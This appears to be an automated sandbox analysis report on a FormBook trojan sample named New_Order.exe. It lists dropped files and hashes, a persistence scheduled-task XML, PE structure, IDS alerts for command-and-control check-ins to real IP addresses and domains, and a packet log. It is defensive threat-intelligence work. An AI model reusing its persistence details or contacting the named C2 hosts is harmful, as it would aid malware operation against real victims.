172.67.184.73 | www.poria.link | United States | 13335 | CLOUDFLARENETUS | true
202.172.28.202 | www.kasegitai.tokyo | Japan | 37907 | DIGIROCKDigiRockIncJP | true
                                                                                              Joe Sandbox Version:38.0.0 Ammolite
                                                                                              Analysis ID:1352630
                                                                                              Start date and time:2023-12-03 16:24:22 +01:00
                                                                                              Joe Sandbox Product:CloudBasic
                                                                                              Overall analysis duration:0h 12m 21s
                                                                                              Hypervisor based Inspection enabled:false
                                                                                              Report type:full
                                                                                              Cookbook file name:default.jbs
                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                              Number of analysed new started processes analysed:25
                                                                                              Number of new started drivers analysed:0
                                                                                              Number of existing processes analysed:0
                                                                                              Number of existing drivers analysed:0
                                                                                              Number of injected processes analysed:3
                                                                                              Technologies:
                                                                                              • HCA enabled
                                                                                              • EGA enabled
                                                                                              • AMSI enabled
                                                                                              Analysis Mode:default
                                                                                              Analysis stop reason:Timeout
                                                                                              Sample file name:New_Order.exe
                                                                                              Detection:MAL
                                                                                              Classification:mal100.troj.spyw.evad.winEXE@32/16@12/9
                                                                                              EGA Information:
                                                                                              • Successful, ratio: 80%
                                                                                              HCA Information:
                                                                                              • Successful, ratio: 89%
                                                                                              • Number of executed functions: 103
                                                                                              • Number of non-executed functions: 279
                                                                                              Cookbook Comments:
                                                                                              • Found application associated with file extension: .exe
                                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                              • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
15:25:18 | Task Scheduler | Run new task: QjSljS path: C:\Users\user\AppData\Roaming\QjSljS.exe
16:25:17 | API Interceptor | 1x Sleep call for process: New_Order.exe modified
16:25:18 | API Interceptor | 63x Sleep call for process: powershell.exe modified
16:25:22 | API Interceptor | 1x Sleep call for process: QjSljS.exe modified
16:26:06 | API Interceptor | 11620773x Sleep call for process: wextract.exe modified
                                                                                              • 185.211.251.125
                                                                                              F00D0B21M4.elfGet hashmaliciousMiraiBrowse
                                                                                              • 37.97.214.109
                                                                                              INV#761538.exeGet hashmaliciousFormBookBrowse
                                                                                              • 37.97.254.27
                                                                                              137-AGROCHLOPECKI_OFFER_list.xlsGet hashmaliciousFormBookBrowse
                                                                                              • 37.97.254.27
                                                                                              QISOVbNi9M.elfGet hashmaliciousMiraiBrowse
                                                                                              • 95.170.75.168
                                                                                              NNL_PO_1023008.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              • 37.97.254.27
                                                                                              003425425124526.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                              • 37.97.254.27
                                                                                              Document.exeGet hashmaliciousFormBookBrowse
                                                                                              • 37.97.254.27
                                                                                              ut3u2l5ZlK.elfGet hashmaliciousMiraiBrowse
                                                                                              • 95.170.75.197
                                                                                              sora.x86.elfGet hashmaliciousMiraiBrowse
                                                                                              • 149.210.216.118
                                                                                              No context
                                                                                              No context
                                                                                              Process:C:\Users\user\Desktop\New_Order.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1216
                                                                                              Entropy (8bit):5.34331486778365
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                              Malicious:false
                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                              Process:C:\Users\user\AppData\Roaming\QjSljS.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1216
                                                                                              Entropy (8bit):5.34331486778365
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                              Malicious:false
                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):2232
                                                                                              Entropy (8bit):5.380285623575084
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:+WSU4xympjgZ9tz4RIoUl8NPZHUl7u1iMuge//ZMRvUyus:+LHxvCZfIfSKRHmOugras
                                                                                              MD5:9263C617DF6F1DC2D198F07F6D8C86CC
                                                                                              SHA1:394FFB7A842D97EAED9139B2C77EE658FF5D5E5C
                                                                                              SHA-256:F562220341D33CC067DAE8EA1AE7AD9028CBC2473EBBB961CF1AC863657526FF
                                                                                              SHA-512:72883F543D33760D53D283343E5D93ECB13D1AA79658AD590166DE8C623F6FBC3C71A4DC500A61D7C32B13464ED0E102FD55270CB18EEA4D49E4302DDE1FEE9E
                                                                                              Malicious:false
                                                                                              Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                              Process:C:\Windows\SysWOW64\wextract.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                              Category:dropped
                                                                                              Size (bytes):114688
                                                                                              Entropy (8bit):0.9746603542602881
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                              Process:C:\Users\user\Desktop\New_Order.exe
                                                                                              File Type:XML 1.0 document, ASCII text
                                                                                              Category:dropped
                                                                                              Size (bytes):1572
                                                                                              Entropy (8bit):5.109060916426997
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaAVxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTnv
                                                                                              MD5:1F41339F82C704BA42496C1FB31F5BCC
                                                                                              SHA1:AE59B7164779F5A1FD836959B8C5C03A9CF15E53
                                                                                              SHA-256:3B0096C846898B6CC8910E2326B2746408EAB57BA256FEB3957E6C8DB3EDD01F
                                                                                              SHA-512:492E83DE8B6CC9AA0B26B7618D4F13CAFC80ECB77E9B85672ACA643B8C2E9430DA375DD2255D9DC39F386ECBA51F65C8B471AB4455CA843B8DD37A69DAA80FE9
                                                                                              Malicious:true
                                                                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                              Process:C:\Users\user\AppData\Roaming\QjSljS.exe
                                                                                              File Type:XML 1.0 document, ASCII text
                                                                                              Category:dropped
                                                                                              Size (bytes):1572
                                                                                              Entropy (8bit):5.109060916426997
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaAVxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTnv
                                                                                              MD5:1F41339F82C704BA42496C1FB31F5BCC
                                                                                              SHA1:AE59B7164779F5A1FD836959B8C5C03A9CF15E53
                                                                                              SHA-256:3B0096C846898B6CC8910E2326B2746408EAB57BA256FEB3957E6C8DB3EDD01F
                                                                                              SHA-512:492E83DE8B6CC9AA0B26B7618D4F13CAFC80ECB77E9B85672ACA643B8C2E9430DA375DD2255D9DC39F386ECBA51F65C8B471AB4455CA843B8DD37A69DAA80FE9
                                                                                              Malicious:false
                                                                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                              Process:C:\Users\user\Desktop\New_Order.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):764416
                                                                                              Entropy (8bit):7.871758108926244
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:L1CFfELXGkJlSUrMSrtpBD/X6xH1BwaPpvP1kvEFafzcXEb+EldXQFwOCU1Ps+U7:L1CFfQ2k7SUrDfWHTRpGdz8M+EldXZOh
                                                                                              MD5:E63F894AE694122FE230D5A91250BC1F
                                                                                              SHA1:7822C03997F535ED9DB4B3ECCF480924686CB995
                                                                                              SHA-256:1317668C84B4E2FDD8E6341A252F45BB44CFEEEA05B11A2E1918F3F4AFADC935
                                                                                              SHA-512:3421B35AD0CC53863525123E9619351E42A8A249A1B9F5C95F9F15AEEC8CC5F677EB7EAD5A469BFE10A057A28CADBDE5183ABCF28E350CF4CF482A2BAED25C21
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: ReversingLabs, Detection: 68%
                                                                                              Process:C:\Users\user\Desktop\New_Order.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):26
                                                                                              Entropy (8bit):3.95006375643621
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                              Malicious:false
                                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Entropy (8bit):7.871758108926244
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                                              File name:New_Order.exe
                                                                                              File size:764'416 bytes
                                                                                              MD5:e63f894ae694122fe230d5a91250bc1f
                                                                                              SHA1:7822c03997f535ed9db4b3eccf480924686cb995
                                                                                              SHA256:1317668c84b4e2fdd8e6341a252f45bb44cfeeea05b11a2e1918f3f4afadc935
                                                                                              SHA512:3421b35ad0cc53863525123e9619351e42a8a249a1b9f5c95f9f15aeec8cc5f677eb7ead5a469bfe10a057a28cadbde5183abcf28e350cf4cf482a2baed25c21
                                                                                              SSDEEP:12288:L1CFfELXGkJlSUrMSrtpBD/X6xH1BwaPpvP1kvEFafzcXEb+EldXQFwOCU1Ps+U7:L1CFfQ2k7SUrDfWHTRpGdz8M+EldXZOh
                                                                                              TLSH:1CF4010473B85F25C9BE1BF95971610283F6386BA532E35D4CC270EA27A6F111E92F27
                                                                                              Icon Hash:90cececece8e8eb0
                                                                                              Entrypoint:0x4bbc8e
                                                                                              Entrypoint Section:.text
                                                                                              Digitally signed:false
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                              Time Stamp:0xA541C5EC [Fri Nov 9 17:05:48 2057 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:4
                                                                                              OS Version Minor:0
                                                                                              File Version Major:4
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:4
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                              Instruction
                                                                                              jmp dword ptr [00402000h]
                                                                                              xor al, 39h
                                                                                              inc esi
                                                                                              cmp byte ptr [edx], dh
                                                                                              aaa
                                                                                              push edx
                                                                                              xor al, 37h
                                                                                              inc edx
                                                                                              xor al, 37h
                                                                                              dec eax
                                                                                              xor byte ptr [eax+edx*2], dh
                                                                                              xor al, 5Ah
                                                                                              cmp byte ptr [ebx+4Eh], dl
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xbbc39          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xbc000          0x620         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xbe000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0xb8cc0          0x70          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
.text   0x2000           0xb9cac       0xb9e00   False     0.9153628320443846  data       7.880750053581327    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0xbc000          0x620         0x800     False     0.333984375         data       3.449930639463436    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xbe000          0xc           0x200     False     0.044921875         data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name         RVA      Size   Type                                                                               Language  Country  ZLIB Complexity
RT_VERSION   0xbc090  0x390  data                                                                                                  0.41885964912280704
RT_MANIFEST  0xbc430  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                     0.5489795918367347
DLL          Import
mscoree.dll  _CorExeMain
Timestamp                 Protocol  SID      Message                                     Source Port  Dest Port  Source IP    Dest IP
12/03/23-16:26:16.668057  TCP       2855465  ETPRO TROJAN FormBook CnC Checkin (GET) M2  49744        80         192.168.2.4  185.151.30.138
12/03/23-16:27:43.947745  TCP       2855465  ETPRO TROJAN FormBook CnC Checkin (GET) M2  49764        80         192.168.2.4  172.67.184.73
12/03/23-16:27:21.256906  TCP       2855465  ETPRO TROJAN FormBook CnC Checkin (GET) M2  49760        80         192.168.2.4  37.97.254.27
12/03/23-16:26:38.894529  TCP       2855465  ETPRO TROJAN FormBook CnC Checkin (GET) M2  49748        80         192.168.2.4  109.68.33.25
12/03/23-16:25:44.407183  TCP       2855465  ETPRO TROJAN FormBook CnC Checkin (GET) M2  49739        80         192.168.2.4  91.195.240.94
12/03/23-16:28:29.296841  TCP       2855465  ETPRO TROJAN FormBook CnC Checkin (GET) M2  49768        80         192.168.2.4  202.172.28.202
12/03/23-16:27:06.930079  TCP       2855465  ETPRO TROJAN FormBook CnC Checkin (GET) M2  49756        80         192.168.2.4  52.68.224.126
12/03/23-16:26:52.795950  TCP       2855465  ETPRO TROJAN FormBook CnC Checkin (GET) M2  49752        80         192.168.2.4  66.29.155.54
Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                                              Dec 3, 2023 16:25:44.657593012 CET4973980192.168.2.491.195.240.94
                                                                                              Dec 3, 2023 16:25:44.657613993 CET4973980192.168.2.491.195.240.94
                                                                                              Dec 3, 2023 16:25:44.847302914 CET804973991.195.240.94192.168.2.4
                                                                                              Dec 3, 2023 16:25:44.847348928 CET804973991.195.240.94192.168.2.4
                                                                                              Dec 3, 2023 16:25:44.847366095 CET804973991.195.240.94192.168.2.4
                                                                                              Dec 3, 2023 16:25:44.847417116 CET4973980192.168.2.491.195.240.94
                                                                                              Dec 3, 2023 16:25:44.847434998 CET804973991.195.240.94192.168.2.4
                                                                                              Dec 3, 2023 16:25:44.847459078 CET804973991.195.240.94192.168.2.4
                                                                                              Dec 3, 2023 16:25:44.847476006 CET4973980192.168.2.491.195.240.94
                                                                                              Dec 3, 2023 16:25:44.847512007 CET804973991.195.240.94192.168.2.4
                                                                                              Dec 3, 2023 16:25:44.847527981 CET804973991.195.240.94192.168.2.4
                                                                                              Dec 3, 2023 16:25:44.847542048 CET804973991.195.240.94192.168.2.4
                                                                                              Dec 3, 2023 16:25:44.847553015 CET4973980192.168.2.491.195.240.94
                                                                                              Dec 3, 2023 16:25:44.847558975 CET804973991.195.240.94192.168.2.4
                                                                                              Dec 3, 2023 16:25:44.847687960 CET4973980192.168.2.491.195.240.94
                                                                                              Dec 3, 2023 16:25:44.848522902 CET4973980192.168.2.491.195.240.94
                                                                                              Dec 3, 2023 16:25:45.037990093 CET804973991.195.240.94192.168.2.4
                                                                                              Dec 3, 2023 16:26:08.693665028 CET4974080192.168.2.4185.151.30.138
                                                                                              Dec 3, 2023 16:26:08.791899920 CET8049740185.151.30.138192.168.2.4
                                                                                              Dec 3, 2023 16:26:08.792071104 CET4974080192.168.2.4185.151.30.138
                                                                                              Dec 3, 2023 16:26:08.792280912 CET4974080192.168.2.4185.151.30.138
                                                                                              Dec 3, 2023 16:26:08.891115904 CET8049740185.151.30.138192.168.2.4
                                                                                              Dec 3, 2023 16:26:08.891136885 CET8049740185.151.30.138192.168.2.4
                                                                                              Dec 3, 2023 16:26:08.891196012 CET4974080192.168.2.4185.151.30.138
                                                                                              Dec 3, 2023 16:26:10.304064989 CET4974080192.168.2.4185.151.30.138
                                                                                              Dec 3, 2023 16:26:11.320837021 CET4974180192.168.2.4185.151.30.138
                                                                                              Dec 3, 2023 16:26:11.418893099 CET8049741185.151.30.138192.168.2.4
                                                                                              Dec 3, 2023 16:26:11.419023037 CET4974180192.168.2.4185.151.30.138
                                                                                              Dec 3, 2023 16:26:11.419369936 CET4974180192.168.2.4185.151.30.138
                                                                                              Dec 3, 2023 16:26:11.518281937 CET8049741185.151.30.138192.168.2.4
                                                                                              Dec 3, 2023 16:26:11.518305063 CET8049741185.151.30.138192.168.2.4
                                                                                              Dec 3, 2023 16:26:11.518573999 CET4974180192.168.2.4185.151.30.138
                                                                                              Dec 3, 2023 16:26:12.927473068 CET4974180192.168.2.4185.151.30.138
                                                                                              Dec 3, 2023 16:26:13.943542004 CET4974380192.168.2.4185.151.30.138
                                                                                              Dec 3, 2023 16:26:14.041928053 CET8049743185.151.30.138192.168.2.4
                                                                                              Dec 3, 2023 16:26:14.042093992 CET4974380192.168.2.4185.151.30.138
                                                                                              Dec 3, 2023 16:26:14.051470041 CET4974380192.168.2.4185.151.30.138
                                                                                              Dec 3, 2023 16:26:14.149749994 CET8049743185.151.30.138192.168.2.4
                                                                                              Dec 3, 2023 16:26:14.149761915 CET8049743185.151.30.138192.168.2.4
                                                                                              Dec 3, 2023 16:26:14.149799109 CET8049743185.151.30.138192.168.2.4
                                                                                              Dec 3, 2023 16:26:14.150461912 CET8049743185.151.30.138192.168.2.4
                                                                                              Dec 3, 2023 16:26:14.150475025 CET8049743185.151.30.138192.168.2.4
                                                                                              Dec 3, 2023 16:26:14.150531054 CET4974380192.168.2.4185.151.30.138
                                                                                              Dec 3, 2023 16:26:15.552490950 CET4974380192.168.2.4185.151.30.138
                                                                                              Dec 3, 2023 16:26:16.568552017 CET4974480192.168.2.4185.151.30.138
                                                                                              Dec 3, 2023 16:26:16.667722940 CET8049744185.151.30.138192.168.2.4
                                                                                              Dec 3, 2023 16:26:16.667840958 CET4974480192.168.2.4185.151.30.138
                                                                                              Dec 3, 2023 16:26:16.668056965 CET4974480192.168.2.4185.151.30.138
                                                                                              Dec 3, 2023 16:26:16.767751932 CET8049744185.151.30.138192.168.2.4
                                                                                              Dec 3, 2023 16:26:16.767774105 CET8049744185.151.30.138192.168.2.4
                                                                                              Dec 3, 2023 16:26:16.767791033 CET8049744185.151.30.138192.168.2.4
                                                                                              Dec 3, 2023 16:26:16.767966986 CET4974480192.168.2.4185.151.30.138
                                                                                              Dec 3, 2023 16:26:16.770114899 CET4974480192.168.2.4185.151.30.138
                                                                                              Dec 3, 2023 16:26:16.868199110 CET8049744185.151.30.138192.168.2.4
                                                                                              Dec 3, 2023 16:26:30.478981018 CET4974580192.168.2.4109.68.33.25
                                                                                              Dec 3, 2023 16:26:30.659307003 CET8049745109.68.33.25192.168.2.4
                                                                                              Dec 3, 2023 16:26:30.659487009 CET4974580192.168.2.4109.68.33.25
                                                                                              Dec 3, 2023 16:26:30.659818888 CET4974580192.168.2.4109.68.33.25
                                                                                              Dec 3, 2023 16:26:30.842624903 CET8049745109.68.33.25192.168.2.4
                                                                                              Dec 3, 2023 16:26:30.842659950 CET8049745109.68.33.25192.168.2.4
                                                                                              Dec 3, 2023 16:26:30.842679024 CET8049745109.68.33.25192.168.2.4
                                                                                              Dec 3, 2023 16:26:30.842796087 CET4974580192.168.2.4109.68.33.25
                                                                                              Dec 3, 2023 16:26:32.161834955 CET4974580192.168.2.4109.68.33.25
                                                                                              Dec 3, 2023 16:26:33.177987099 CET4974680192.168.2.4109.68.33.25
                                                                                              Dec 3, 2023 16:26:33.360989094 CET8049746109.68.33.25192.168.2.4
                                                                                              Dec 3, 2023 16:26:33.361079931 CET4974680192.168.2.4109.68.33.25
                                                                                              Dec 3, 2023 16:26:33.361574888 CET4974680192.168.2.4109.68.33.25
                                                                                              Dec 3, 2023 16:26:33.548120975 CET8049746109.68.33.25192.168.2.4
